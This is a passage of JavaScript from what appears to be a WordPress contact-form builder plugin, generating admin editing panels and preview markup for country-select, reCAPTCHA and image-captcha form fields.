           	td2.setAttribute("id", i+"_element_sectionform_id_temp");

      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
		
	var table_little = document.createElement('table');
           	table_little.setAttribute("id", i+"_table_little");
			
      	var tr_little1 = document.createElement('tr');
	        tr_little1.setAttribute("id", i+"_element_tr1");
		
      	var tr_little2 = document.createElement('tr');
 	        tr_little2.setAttribute("id", i+"_element_tr2");
			
      	var td_little1 = document.createElement('td');
         	td_little1.setAttribute("valign", 'top');
           	td_little1.setAttribute("id", i+"_td_little1");
			
      	var td_little2 = document.createElement('td');
        	td_little2.setAttribute("valign", 'top');
           	td_little2.setAttribute("id", i+"_td_little2");
			

      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
	if(w_required=="yes")
			required.innerHTML = " *";
	var select_ = document.createElement('select');
		select_.setAttribute("id", i+"_elementform_id_temp");
		select_.setAttribute("name", i+"_elementform_id_temp");
		select_.style.cssText = "width:"+w_size+"px";
		
		
		for(r=0;r<w_countries.length;r++)
		{
		var option_ = document.createElement('option');
			option_.setAttribute("value", w_countries[r]);
			option_.innerHTML=w_countries[r];
		select_.appendChild(option_);
		}
      	var main_td  = document.getElementById('show_table');
	
      
      	td1.appendChild(label);
      	td1.appendChild(required);
	td2.appendChild(adding_type);
	
	td2.appendChild(adding_required);
      	td2.appendChild(select_);
      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      
      	div.appendChild(table);
      	div.appendChild(br3);
      	main_td.appendChild(div);
	
	if (w_field_label_pos=="top") {
    label_top(i);
  }
  change_class(w_class, i);
  refresh_attr(i, 'type_text');
  spider_popup();
}

function type_recaptcha(i,w_field_label, w_field_label_pos, w_public, w_private, w_theme, w_class, w_attr_name, w_attr_value){
    document.getElementById("element_type").value="type_recaptcha";

	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black;padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");

	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");

	var edit_main_tr8  = document.createElement('tr');
      		edit_main_tr8.setAttribute("valing", "top");

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";	
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
		
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
	var edit_main_td7_1 = document.createElement('td');
		edit_main_td7_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td8 = document.createElement('td');
		edit_main_td8.style.cssText = "padding-top:10px";
	var edit_main_td8_1 = document.createElement('td');
		edit_main_td8_1.style.cssText = "padding-top:10px";
		  
	var el_label_label = document.createElement('label');
	    el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
	        el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                
		el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
	Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");
                el_label_position2.setAttribute("value", "top");
		
                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
	Top = document.createTextNode("Top");
		
	if(w_field_label_pos=="top")
				el_label_position2.setAttribute("checked", "checked");
	else
				el_label_position1.setAttribute("checked", "checked");

	var el_style_label = document.createElement('label');
	    el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
        el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
        el_style_textarea.style.cssText = "width:200px;";
        el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_public_label = document.createElement('label');
	    el_public_label.style.cssText ="color:#BA0D0D; font-weight:bold; font-size: 13px;text-decoration:underline";
		el_public_label.innerHTML = "Public key";
	
	var el_public_textarea = document.createElement('input');
        el_public_textarea.setAttribute("id", "public_key");
		el_public_textarea.setAttribute("type", "text");
		el_public_textarea.setAttribute("value", w_public);
        el_public_textarea.style.cssText = "width:200px;";
        el_public_textarea.setAttribute("onChange", "change_key(this.value, 'public_key')");


	var el_private_label = document.createElement('label');
	    el_private_label.style.cssText ="color:#BA0D0D; font-weight:bold; font-size: 13px; text-decoration:underline";
		el_private_label.innerHTML = "Private key";
	
	var el_private_textarea = document.createElement('input');
        el_private_textarea.setAttribute("id", "private_key");
		el_private_textarea.setAttribute("type", "text");
		el_private_textarea.setAttribute("value", w_private);
        el_private_textarea.style.cssText = "width:200px;";
        el_private_textarea.setAttribute("onChange", "change_key(this.value, 'private_key')");


	var el_theme_label = document.createElement('label');
	    el_theme_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_theme_label.innerHTML = "Recaptcha Theme";
	
	var el_theme_select = document.createElement('select');
        el_theme_select.style.cssText = "width:100px;";
        el_theme_select.setAttribute("onChange", "change_key(this.value, 'theme')");
		
	var el_theme_option1 = document.createElement('option');
		el_theme_option1.value="red";
		el_theme_option1.innerHTML="Red";
		
	var el_theme_option2= document.createElement('option');
		el_theme_option2.value="white";
		el_theme_option2.innerHTML="White";
		
	var el_theme_option3= document.createElement('option');
		el_theme_option3.value="blackglass";
		el_theme_option3.innerHTML="Blackglass";
	
	var el_theme_option4= document.createElement('option');
		el_theme_option4.value="clean";
		el_theme_option4.innerHTML="Clean";
	
	el_theme_select.appendChild(el_theme_option1);
	el_theme_select.appendChild(el_theme_option2);
	el_theme_select.appendChild(el_theme_option3);
	el_theme_select.appendChild(el_theme_option4);
	
	el_theme_select.value=w_theme;
	
		
		
		

	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_recaptcha')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_recaptcha')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_recaptcha')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_recaptcha')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}
		
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br2);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);
	
	edit_main_td4.appendChild(el_style_label);
	edit_main_td4_1.appendChild(el_style_textarea);
	
	edit_main_td6.appendChild(el_public_label);
	edit_main_td6_1.appendChild(el_public_textarea);
	
	edit_main_td7.appendChild(el_private_label);
	edit_main_td7_1.appendChild(el_private_textarea);
	
	edit_main_td8.appendChild(el_theme_label);
	edit_main_td8_1.appendChild(el_theme_select);
	
	edit_main_td5.appendChild(el_attr_label);
	edit_main_td5.appendChild(el_attr_add);
	edit_main_td5.appendChild(br3);
	edit_main_td5.appendChild(el_attr_table);
	edit_main_td5.setAttribute("colspan", "2");

	/*edit_main_td4.appendChild(el_first_value_label);
	edit_main_td4.appendChild(br3);
	edit_main_td4.appendChild(el_first_value_input);*/
	
/*	edit_main_td5.appendChild(el_guidelines_label);
	edit_main_td5.appendChild(br4);
	edit_main_td5.appendChild(el_guidelines_textarea);
*/	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
//	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr7);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_text');
	
//show table

	element='img';	type='captcha'; 
		var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_recaptcha");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");

		var adding = document.createElement('div');
      	    adding.setAttribute("id", "wd_recaptchaform_id_temp");
      	    adding.setAttribute("public_key", w_public);
      	    adding.setAttribute("private_key", w_private);
      	    adding.setAttribute("theme", w_theme);
			
		var adding_text = document.createElement('span');
			adding_text.style.color="red";
			adding_text.style.fontStyle="italic";
			adding_text.innerHTML="Recaptcha doesn't display in back end";
			
		adding.appendChild(adding_text);
		
		var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
					
      	var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");
			
      	var tr = document.createElement('tr');
			
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'top');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'top');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");
		
	
      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
      

      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
	    
      	var main_td  = document.getElementById('show_table');
      
      	td1.appendChild(label);
      	td2.appendChild(adding_type);
      	td2.appendChild(adding);
      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      
      	div.appendChild(table);
      	div.appendChild(br3);
      	main_td.appendChild(div);
	if(w_field_label_pos=="top")
				label_top(i);
change_class(w_class, i);
refresh_attr(i, 'type_recaptcha');
}

function type_captcha(i,w_field_label, w_field_label_pos, w_digit, w_class, w_attr_name, w_attr_value){
    document.getElementById("element_type").value="type_captcha";

	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black;padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      	edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";	
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";
	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px";
		
	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
		  
	var el_label_label = document.createElement('label');
	    el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
        el_label_textarea.setAttribute("id", "edit_for_label");
        el_label_textarea.setAttribute("rows", "4");
        el_label_textarea.style.cssText = "width:200px";
        el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
	    el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
        el_label_position1.setAttribute("id", "edit_for_label_position_top");
        el_label_position1.setAttribute("type", "radio");
        el_label_position1.setAttribute("value", "left");
        
		el_label_position1.setAttribute("name", "edit_for_label_position");
        el_label_position1.setAttribute("onchange", "label_left("+i+")");
		
	Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
        el_label_position2.setAttribute("id", "edit_for_label_position_left");
        el_label_position2.setAttribute("type", "radio");
        el_label_position2.setAttribute("value", "top");
		
        el_label_position2.setAttribute("name", "edit_for_label_position");
        el_label_position2.setAttribute("onchange", "label_top("+i+")");
	Top = document.createTextNode("Top");
		
	if(w_field_label_pos=="top")
		el_label_position2.setAttribute("checked", "checked");
	else
		el_label_position1.setAttribute("checked", "checked");

	var el_size_label = document.createElement('label');
	    el_size_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_size_label.innerHTML = "Captcha size";
	
	var el_captcha_digit = document.createElement('input');
        el_captcha_digit.setAttribute("id", "captcha_digit");
        el_captcha_digit.setAttribute("type", "text");
        el_captcha_digit.setAttribute("value", w_digit);
		el_captcha_digit.setAttribute("name", "captcha_digit");
 		el_captcha_digit.setAttribute("onKeyPress", "return check_isnum_3_10(event)");
        el_captcha_digit.setAttribute("onKeyUp", "change_captcha_digit(this.value, '"+i+"')");
	    el_captcha_digit.style.cssText ="margin-right:18px";

	Digits = document.createTextNode("Digits (3 - 9)");
	
	var el_style_label = document.createElement('label');
	    el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
        el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
        el_style_textarea.style.cssText = "width:200px;";
        el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_attr_label = document.createElement('label');
	    el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_attr_label.innerHTML = "Additional Attributes";
		
	var el_attr_add = document.createElement('img');
        el_attr_add.setAttribute("id", "el_choices_add");
        el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
        el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
        el_attr_add.setAttribute("title", 'add');
        el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_captcha')");
		
	var el_attr_table = document.createElement('table');
        el_attr_table.setAttribute("id", 'attributes');
        el_attr_table.setAttribute("border", '0');
        el_attr_table.style.cssText = 'margin-left:0px';
		
	var el_attr_tr_label = document.createElement('tr');
        el_attr_tr_label.setAttribute("idi", '0');
		
	var el_attr_td_name_label = document.createElement('th');
        el_attr_td_name_label.style.cssText = 'width:100px';
		
	var el_attr_td_value_label = document.createElement('th');
        el_attr_td_value_label.style.cssText = 'width:100px';
		
	var el_attr_td_X_label = document.createElement('th');
        el_attr_td_X_label.style.cssText = 'width:10px';
		
	var el_attr_name_label = document.createElement('label');
	    el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
		el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	    el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
		el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_captcha')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_captcha')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_captcha')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}
		
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br2);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);
	
	edit_main_td3.appendChild(el_size_label);
	edit_main_td3_1.appendChild(el_captcha_digit);
	edit_main_td3_1.appendChild(Digits);
	
	edit_main_td4.appendChild(el_style_label);
	edit_main_td4_1.appendChild(el_style_textarea);
	
	edit_main_td5.appendChild(el_attr_label);
	edit_main_td5.appendChild(el_attr_add);
	edit_main_td5.appendChild(br3);
	edit_main_td5.appendChild(el_attr_table);
	edit_main_td5.setAttribute("colspan", "2");

	/*edit_main_td4.appendChild(el_first_value_label);
	edit_main_td4.appendChild(br3);
	edit_main_td4.appendChild(el_first_value_input);*/
	
/*	edit_main_td5.appendChild(el_guidelines_label);
	edit_main_td5.appendChild(br4);
	edit_main_td5.appendChild(el_guidelines_textarea);
*/	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_captcha');
	
//show table

	element='img';	type='captcha'; 
		var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_captcha");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");


	var adding = document.createElement(element);
           	adding.setAttribute("type", type);
           	adding.setAttribute("digit", w_digit);
           	adding.setAttribute("src", url_for_ajax+"?action=formcontactwdcaptcha"+"&digit="+w_digit+"&i=form_id_temp");
			adding.setAttribute("id", "_wd_captchaform_id_temp");
			adding.setAttribute("class", "captcha_img");
			adding.setAttribute("onClick", "captcha_refresh('_wd_captcha','form_id_temp')");
			
   
		
	var refresh_captcha = document.createElement("div");
          //refresh_captcha.setAttribute("src", fmc_plugin_url+"/images/refresh.png");
			refresh_captcha.setAttribute("class", "captcha_refresh");
			refresh_captcha.setAttribute("id", "_element_refreshform_id_temp");
			refresh_captcha.setAttribute("onClick", "captcha_refresh('_wd_captcha','form_id_temp')");

	var input_captcha = document.createElement("input");
           	input_captcha.setAttribute("type", "text");
			input_captcha.style.cssText = "width:"+(w_digit*10+15)+"px;";
			input_captcha.setAttribute("class", "captcha_input");
			input_captcha.setAttribute("id", "_wd_captcha_inputform_id_temp");
			input_captcha.setAttribute("name", "captcha_input");

     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
					
      	var table = document.createElement('table');
           	table.setAttribute("id", i+"_elemet_tableform_id_temp");
			
      	var tr = document.createElement('tr');
			
      	var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'top');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'top');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");
		
	var captcha_table = document.createElement('table');
	
      	var captcha_tr1 = document.createElement('tr');
      	var captcha_tr2 = document.createElement('tr');

      	var captcha_td1 = document.createElement('td');
		captcha_td1.setAttribute("valign", 'middle');

      	var captcha_td2 = document.createElement('td');
  		captcha_td2.setAttribute("valign", 'middle');
    	var captcha_td3 = document.createElement('td');
	
	captcha_table.appendChild(captcha_tr1);
      	captcha_table.appendChild(captcha_tr2);
      	captcha_tr1.appendChild(captcha_td1);
      	captcha_tr1.appendChild(captcha_td2);
      	captcha_tr2.appendChild(captcha_td3);
	
      	captcha_td1.appendChild(adding);
      	captcha_td2.appendChild(refresh_captcha);
